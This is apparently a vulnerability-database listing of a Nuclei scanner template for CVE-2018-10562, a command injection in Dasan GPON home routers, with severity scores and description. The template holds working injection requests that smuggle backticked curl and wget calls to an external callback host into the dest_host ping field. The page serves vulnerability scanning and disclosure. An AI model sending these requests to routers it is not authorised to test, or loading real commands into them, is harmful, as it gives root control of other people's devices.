Lucene search

ProjectDiscoveryNUCLEI:CVE-2018-10562

HistoryApr 02, 2022 - 2:56 p.m.

Dasan GPON Devices - Remote Code Execution

2022-04-0214:56:35

ProjectDiscovery

github.com

cve

cve2018

dasan

gpon

rce

oast

kev

dasannetworks

command injection

vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON

Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output.

id: CVE-2018-10562

info:
  name: Dasan GPON Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
    - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
    - https://github.com/ethicalhackeragnidhra/GPON
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-10562
    cwe-id: CWE-78
    epss-score: 0.97423
    epss-percentile: 0.99934
    cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dasannetworks
    product: gpon_router_firmware
  tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /GponForm/diag_Form?images/ HTTP/1.1
        Host: {{Hostname}}

        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0
      - |
        POST /GponForm/diag_Form?images/ HTTP/1.1
        Host: {{Hostname}}

        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 490a00463044022076907511f4f625fb84a997087590fa36dac01d612d1802c6b579d54c508c623e02203ef2be0b835b4c686a29db3a4afcd4875d69783fc68a917690ddb802c2401758:922c64590222798bb761d5b6d8e72950